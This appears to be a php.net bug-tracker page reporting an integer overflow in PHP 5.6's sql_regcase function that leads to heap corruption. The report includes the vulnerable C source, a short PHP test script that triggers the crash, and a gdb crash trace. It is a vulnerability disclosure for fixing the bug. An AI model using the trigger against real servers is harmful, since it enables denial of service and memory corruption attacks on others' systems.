|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-08-16 06:50 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2016-08-16 06:50 UTC] stas@php.net
[2016-08-16 07:26 UTC] minhrau dot vc dot 365 at gmail dot com
[2016-08-17 05:57 UTC] stas@php.net
[2016-08-17 05:57 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-08-17 08:23 UTC] stas@php.net
[2016-08-17 09:15 UTC] laruence@php.net
[2016-08-18 11:15 UTC] tyrael@php.net
[2016-10-17 10:09 UTC] bwoebi@php.net
[2017-02-13 01:45 UTC] stas@php.net
-Type: Security
+Type: Bug
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Sat Nov 23 08:01:28 2024 UTC |
Description: ------------ An integer overflow in sql_regcase function will lead to heap corruption. Please see comment about this vulnerability below: PHP_EREG_API PHP_FUNCTION(sql_regcase) { char *string, *tmp; int string_len; unsigned char c; register int i, j; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &string, &string_len) == FAILURE) { return; } tmp = safe_emalloc(string_len, 4, 1); //if string_len = INT_MAX + 1, the size supply to safe_emalloc will be 1 // It'll lead to the heap corruption in the loop below. Please check the crash log for more detail. for (i = j = 0; i < string_len; i++) { c = (unsigned char) string[i]; if (isalpha(c)) { tmp[j++] = '['; tmp[j++] = toupper(c); tmp[j++] = tolower(c); tmp[j++] = ']'; } else { tmp[j++] = c; } } Test script: --------------- <?php ini_set('memory_limit', -1); $str = str_repeat('x', 0xffffffff/4)."a"; $str1 = sql_regcase($str); ?> Expected result: ---------------- No crash Actual result: -------------- (gdb) b ereg.c:742 Breakpoint 1 at 0x4632e4: file /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c, line 742. (gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/minhrau/PHP-5.6.24/sapi/cli/php testsql_regcase_negativelength.php [Thread debugging using libthread_db enabled] Using host libthread_db library "/usr/lib/libthread_db.so.1". Breakpoint 1, zif_sql_regcase (ht=<optimized out>, return_value=0x7ffff7fa2fb0, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c:742 742 tmp = safe_emalloc(string_len, 4, 1); (gdb) p string_len $1 = 1073741824 (gdb) p string_len*4+1 $2 = 1 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x000000000046332c in zif_sql_regcase (ht=<optimized out>, return_value=0x7ffff7fa2fb0, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c:747 747 tmp[j++] = '['; (gdb) bt #0 0x000000000046332c in zif_sql_regcase (ht=<optimized out>, return_value=0x7ffff7fa2fb0, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c:747 #1 0x00000000007f908d in zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:558 #2 0x0000000000783b4e in execute_ex (execute_data=0x7ffff7f6f260) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:363 #3 0x000000000074ed41 in zend_execute_scripts (type=type@entry=8, retval=retval@entry=0x0, file_count=file_count@entry=3) at /home/minhrau/PHP-5.6.24/Zend/zend.c:1341 #4 0x00000000006ed0d0 in php_execute_script (primary_file=primary_file@entry=0x7fffffffd0e0) at /home/minhrau/PHP-5.6.24/main/main.c:2613 #5 0x00000000007faa97 in do_cli (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:994 #6 0x00000000004361e4 in main (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:1378 (gdb)